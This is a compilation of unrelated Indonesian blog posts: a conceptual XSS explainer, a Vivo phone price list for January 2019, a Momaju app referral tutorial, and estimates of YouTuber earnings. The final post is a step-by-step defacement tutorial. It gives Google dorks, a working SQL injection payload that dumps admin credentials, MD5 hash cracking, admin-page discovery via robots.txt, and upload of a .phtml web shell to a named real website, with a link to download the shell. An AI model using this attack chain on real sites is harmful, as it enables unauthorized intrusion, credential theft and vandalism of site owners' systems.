Pengertian XSS

Naufal Ardhani - Cross Site Scripting XSS adalah salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Mengapa Cross Site Scripting disingkat XSS bukannya CSS? Karna Singkatan CSS sudah digunakan untuk cascade style sheet.


Bingung script XSS seperti apa? silahkan lihat DISINI.

Tipe XSS

• Reflected
• Stored

Reflected XSS
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.

Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.

Contoh penyerangan menggunakan XSS (Nama – nama yang saya pakai merupakan karangan) :

1. Toni sering mengunjungi website jack, yang di website tersebut memungkinkan toni untuk memasukan username/password dan menyimpan data pribadi atau data transaksi yang seharusnya tidak boleh diketahui orang lain.

2. Rey mengetahui bahwa toni sering mengunjungi web tersebut, dan lalu mengamati jika di website buatan Jack terdapat kerentanan atau celah yang bisa diserang menggunakan xss

3. Rey lalu mengekplore dan mencoba mencari celahnya dan membuat script berbahaya dan kemudian di embed atau dimasukan ke dalam sbuah URL

4. Rey lalu mengirim email ke toni yang berisi link ke halaman web jack yang sebenernya urlnya sudah di embed script yang berbahaya tersebut, serta merayunya dengan alasan palsu atau sejenisnya.

5. saat Toni click URL tersebut maka toni akan masuk ke dalam website jack serta script yang sudah rey buat akan dijalankan, sehingga rey bisa mengmbil data dari cookienya dan bisa memanfaatkanya.


Stored XSS
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.


Sekian saja artikel yang tentang pengertian XSS semoga ada dapat memahami dengan mudah dan jangan lupa berkomentar dibawah.

Referensi :
https://upyes.wordpress.com/2013/05/18/pengertian-xss/
https://en.wikipedia.org/wiki/Cross-site_scripting

Daftar Harga HP Vivo Terbaru Bulan January 2019

SEKODE - Persaingan industri smartphone memang sudah mulai dikuasai oleh berbagai vendor dari China, selain Xiaomi dan Huawei, ada Vivo yang juga cukup bersaing ketat di pasaran. Jajaran produk Vivo memang sudah tida bisa dipandang sebelah mata, beberapa produknya kerap menyedot perhatian.

Di tahun 2018, Vivo sempat merilis Vivo V11 Pro dan Vivo V11 yang cukup  menarik banyak minat konsumen, khusunya di Indonesia. Ponsel ini hadir dengan bentuk poni yang mungil untuk memuat kamera depan, sehingga tampian layar ponsel tersebut akan lebih lega karena memiliki aspek rasio yang lebih luas.

Selain itu, pabrikan asal China ini juga sempat merilis Vivo Nex yang tidak kalah menarik, ponsel ini tampil dengan layar penuh, bersih tanpa kehadiran poni. Pasalnya, Vivo membenamkan kamera depan pada sebuah sistem pop-up yang akan muncul ketika kamera depan akan digunakan.

Dibandingkan bulan lalu, di awal tahun 2019 ini, harga jajaran ponsel Vivo cukup mengalami banyak penurunan harga meskipun tidak terlalu signifikan. Langsung saja berikut ini adalah daftar harga HP Vivo terbaru bulan Januari 2019 yang kami ulas dari berbagai toko online di Indonesia.

Daftar Harga HP Vivo Terbaru Bulan Januari 2019

TYPE	HARGA
Vivo Y21	Rp1.349.000,-
Vivo Y51	Rp1.769.000,-
Vivo Y28	Rp2.340.000,-
Vivo Y35	Rp2.400.000,-
Vivo V3	Rp2.325.000,-
Vivo V5 Plus	Rp2.099.000,-
Vivo Y31	Rp900.000,-
Vivo Y51L	Rp1.550.000,-
Vivo V5s	Rp2.599.000,-
Vivo Y55s	Rp1.299.000,-
Vivo Y53	Rp1.499.000,-
Vivo Y91	Rp1.775.000,-
Vivo Y15	Rp1.225.000,-
Vivo Y55	Rp1.887.000,-
Vivo Y69	Rp2.320.000,-
Vivo Y65	Rp1.650.000,-
Vivo V7+	Rp2.999.000,-
Vivo V7	Rp2.199.000,-
Vivo Y71	Rp1.575.000,-
Vivo V9	Rp2.999.000,-
Vivo Y83	Rp2.320.000,-
Vivo V11	Rp3.799.000,-
Vivo V11 Pro	Rp4.450.000,-
Vivo Nex A	Rp-
Vivo Nex S	Rp-

Demikian ulasan mengenai daftar harga HP Vivo terbaru bulan january 2019, semoga bisa bermanfaat untuk kalian semua yang membutuhkan informasi tentang harga smartphone terbaru.

Cara mendapatkan Uang dari aplikasi Momaju

Hallo Brada,

Diartikel ke seratus delapan ini, Saya akan memberikan Tutorial Cara bermain di aplikasi Momaju hingga mendapatkan Uang secara mudah.

Momaju adalah aplikasi dengan misi sosial yaitu untuk meningkatkan penghasilan dan kesejahteraan bagi masyrakat Indonesia dengan pemberdayaan manusia.

Melalui momaju, kamu bisa mendaftarkan diri menjadi mitra (agen) momaju dan melaksanakan tugas tugas mulia dalam membantu UMKM lokal bertumbuh dan sebagai hasilnya kamu akan mendapatkan sejumlah komisi atas setiap tugas yang telah kamu selesaikan.

Momaju juga aplikasi yang dapat digunakan untuk mengajukan pinjaman modal usaha bagi UMKM dan kedepannya dapat digunakan untuk mengajukan layanan yang dapat membantu usaha UMKM untuk berkembang seperti asuransi, pendaftaran badan usaha, dan sebagainya

Dengan menjadi bagian dari mitra momaju, tidak hanya memberikan kamu dan keluarga kamu kesejahteraan yang lebih baik, selain itu kamu juga menjadi bagian dari misi untuk meningkatkan kemampuan UMKM untuk bertumbuh dengan mendapatkan akses layanan keuangan.

Supaya bisa berpartisipasi, Anda harus memiliki umur 17+.

Cara mendapatkan Uang di aplikasi Momaju

Sebelumnya Anda harus menyiapkan Smartphone, Koneksi Internet, Nomor Handphone, Rekening Bank dan KTP.

Jika sudah menyiapkan alat dan bahan yang diperlukan diatas, silahkan melanjutkan membaca Tutorial ini.

1. Pertama, silahkan download aplikasi Momaju di PlayStore dan buka apknya.

2. Kedua, tunggu loading selesai dan pilih "Lanjut" hingga akhir, lalu pilih "Ayo Mulai!".

3. Ketiga, silahkan mendaftar / membuat akun dengan cara memilih "Registrasi" dan lengkapi nomor Handphone pada kolom yang telah disediakan dan pilih "Mulai" lalu lakukan Verifikasi dengan cara memasukkan kode yang telah dikirim melalui sms. Jika sudah pilih "Verifikasi".

4. Keempat, lengkapi informasi data diri Anda dengan benar. Kode refferal/referensi/promo silahkan isi: 08999421468.

Jika tidak bisa, silahkan kosongin saja. Karena saat ini kode refferal hanya bisa digunakan untuk daerah Jabodetabek.

Jika sudah terisi semua, silahkan centang "Saya berusia diatas..." dan "Saya memiliki rekening atas..." lalu pilih "Daftar" dan centang "Saya telah membaca..." kemudian pilih "Setuju".

Selamat Anda telah berhasil mendaftar / membuat akun dan masuk pada aplikasi Momaju.

Anda akan memperoleh bonus pendaftaran berupa Uang senilai Rp. 10.000,-.

Untuk cara lain memperoleh Uang adalah dengan cara menyelesaikan Tugas yang berada pada pojok kanan bawah dan mengajak teman untuk bermain di aplikasi ini lalu suruh dia untuk memasukkan kode refferal Anda berupa nomor handphone yang telah Anda daftarkan (Reward: Rp.10.000,-).

Namun Sayangnya saat ini Tugas pada misi belum tersedia dan fitur memasukkan kode promo teman hanya bisa dilakukan untuk warga Jabotetabek.

Jadi jika Anda warga Jabotetabek ini adalah kesempatan Anda untuk mengajak teman Anda sebanyak-banyaknya, dan yang untuk di luar Jabotetabek kita sabar saja dulu ya.

Untuk mengecek saldo, melakukan penarikan, melihat link refferal, dan mengedit profil, silahkan pilih menu yang berada di pojok kiri bawah.

Minimal pencairan adalah 50 ribu dan Anda harus melengkapi profil terlebih dahulu supaya bisa melakukan pencairan ke Rekening Bank.

Nah, itulah Tutorial mengenai Momaju. Jika Anda mempunyai pertanyaan atau pengalaman, silahkan berkomentar di bawah.

Terimakasih.

10 Youtuber Terkaya Di Indonesia, Berapa Gaji Mereka Dari Youtube?

Semua orang sudah pasti ingin ngerasain gimana rasanya jadi orang kasa kaya, kerjanya cuma  pelesiran dapat uang terus tiap hari, make money everywhere :v maka dari itu saya ingin memotivasi kalian bahkan buat saya sendiri. saya akan menuliskan beberapa youtuber indonesia yang berhasil dan sukses berpenghasilan dari youtube.

1. Raditya Dika

Siapa siih anak muda jaman sekarang yang enggak kenal sama si Raditya Dika, dia merupakan selebriti sekaligus YouTuber terpopuler di Indonesia. Subscriber penulis buku 'Kambing Jantan' itu sudah mencapai lebih dari 5.4 juta.  estimasi pendapatan Raditya Dika per tahun sekitar US$ 50 ribu hingga US$ 750 ribu atau Rp 700 juta sampai Rp 10 miliar, jumal yang sangat fantastis bukan? buat beli bakso bisa kebagian tuh satu kelurahan :v

2. Bayu Skak

Bayu Skak adalah salah satu youtuber Indonesia paling populer, Ia kini memiliki lebih dari 2 juta subscriber. Estimasi pendapatan  Bayu Skak per tahun sekitar US$ 40 ribu sampai US$ 380 ribu atau Rp 400 juta hingga Rp 4,2 miliar.

3. Ria Ricis

Adik dari Oki Setiana Dewi, Ria Yunita atau yang akrab disapa Ria Ricis juga memiliki penghasilan miliaran rupiah per tahun. Wanita dengan nama akun YouTube 'Ricis Official' itu mempunyai subscriber lebih dari 7,9 juta. Estimasi pendapatan Ria dari YouTube sekitar US$ 100 ribu hingga US$ 10 juta atau Rp 5.6 miliar sampai Rp 18 miliar pertahun.

4. Atta Halilintar

Keluarga YouTuber yang dikenal dengan nama Atta Halilintar termasuk salah satu peraup miliaran rupiah dari platform YouTube. Mereka kini sudah memiliki lebih dari 8.4 juta subscriber. Estimasi penghasilan per tahun dari akun YouTube Atta Halilintar mencapai US$ 565 ribu hingga US$ 8,8 juta atau Rp 4,3 miliar sampai Rp 80 miliar.

5. Young Lex

Rapper Young Lex mempunyai akun YouTube dengan jumlah subscriber lebih dari 1,5  juta. Estimasi pendapatan yang dimiliki Young Lex dari YouTuber berkisar antara US$ 200 ribu hingga US$ 900 ribu atau Rp 900 juta sampai Rp 9,9 miliar.

6.Eddho Zell

YouTuber yang pandai memuat konten berupa video parodi atau tips lucu, Edho Zell, mempunyai penghasilan miliaran rupiah per tahun. Edho Zell memiliki subscriber lebih dari 2,5 juta. Estimasi pendapatannya mulai dari US$ 50 ribu hingga US$ 522 ribu atau sekitar Rp 447 juta sampai Rp 10,4 miliar.

7. Ini Vindy

YouTuber yang juga berprofesi sebagai makeup artist Ini Vindy termasuk salah satu influencer Indonesia yang meraup miliaran rupiah per tahun. Estimasi penghasilan YouTuber asal Surabaya itu mulai dari US$ 15 ribu hingga US$ 251 ribu atau Rp 203 juta sampai Rp 3,4 miliar, dengam jumlah subscriber lebih dari 1 juta. 

8. Reza Oktavian

Reza Oktovian, salah satu YouTuber yang sukses berpenghasilan miliaran rupiah setiap tahun. YouTuber dengan subscriber lebih dari 2.4 juta itu memiliki penghasilan sekitar US$ 30 ribu hingga US$ 645 ribu atau Rp 635 juta sampai Rp 5,8 miliar.

9. Kevin Hendrawan

Kevin Hendrawan merupakan salah satu YouTuber Indonesia yang mempunyai subscriber lebih dari 1,2 juta. Penghasilan Kevin dari YouTube mencapai US$ 20 ribu sampai US$ 250 ribu atau Rp 350 juta hingga Rp 4,6 miliar per tahun.

10. Arief Muhammad

YouTuber Arief Muhammad memiliki lebih dari 1,6juta subscriber. Estimasi penghasilannya menurut Social Blade sekitar US$ 25 ribu hingga US$ 350 ribu atau Rp 356 juta hingga Rp 3,9 miliar pertahun.

Bagaimanakah sistem pembayaran youtube....?

Biaya Pembayaran Per Seribu Tayang

Sistem pembayaran di Youtube dikenal masyarakat dengan istilah BPS atau Biaya Per Seribu untuk setiap tayangan iklan di dalam video kamu yang ditayangkan sebanyak 1000 kali di youtube. Pendapatan per 1000 tayangan iklan merupakan penghasilan kotor.

Kalkulasi pembayarannya adalah RPM (Revenue Per Thousand Impression pendapatan rata-rata yang bisa di dapatkan dari setiap 1000 impresi) = penghasilan bersih/jumlah tampilan halaman x 1000.

Penghasilan Publisher Adsense, RPM yang di peroleh antara $1-$5, ini juga tergantung dimana wilayah kamu tinggal, jenis konten, dan relevansi iklan (termasuk lamanya tayang pada setiap video). Bagaimana? Tertarik menjadi youtuber? Pelajari seluk beluknya dulu ya.

Tutorial Deface dengan cara Sql Lokomedia Terbaru 2019

Oh iya ane mau share cara deface lg nih , tapi dengan cara yg berbeda :v , kali ini ane share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V

Bahan Bahan :

#Dork : inurl:/statis-1-profil.html
             inurl:/statis-2-profil.html
             inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]

#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
  password shellnya : akugans

#Exploit :

'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

#Admin finder online/admin finder tools jg boleh :v

#oh ea , saran ane sih sambil dengerin musik Marshmello :v


Caranya :

1. seperti biasanya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya tapi cari yg ada halaman statisnya :v, lihat gambar :v

2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar

3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
 http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v

4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA

5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx  ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar

6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, bisa juga pke admin finder tools :v, bisa juga pke cara manual nih ane ajarin , caranya

*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v

7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini

8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v
OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v

9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v

10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
      jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v


11. ok klo shell udh berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu  . jadi kaya gini http://sewakursimejamurah.com/files/shell.phtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v ... nah dan jreng jreng ane udh ketemu nih akses shellnya lihat gambar :v

hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalo mau jadi bajingan tapi ragu-ragu mending jangan

h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v

Oh iya klo ada link atau gambar yg ga muncul atau ada yg ga ngerti bisa langsung kontak ane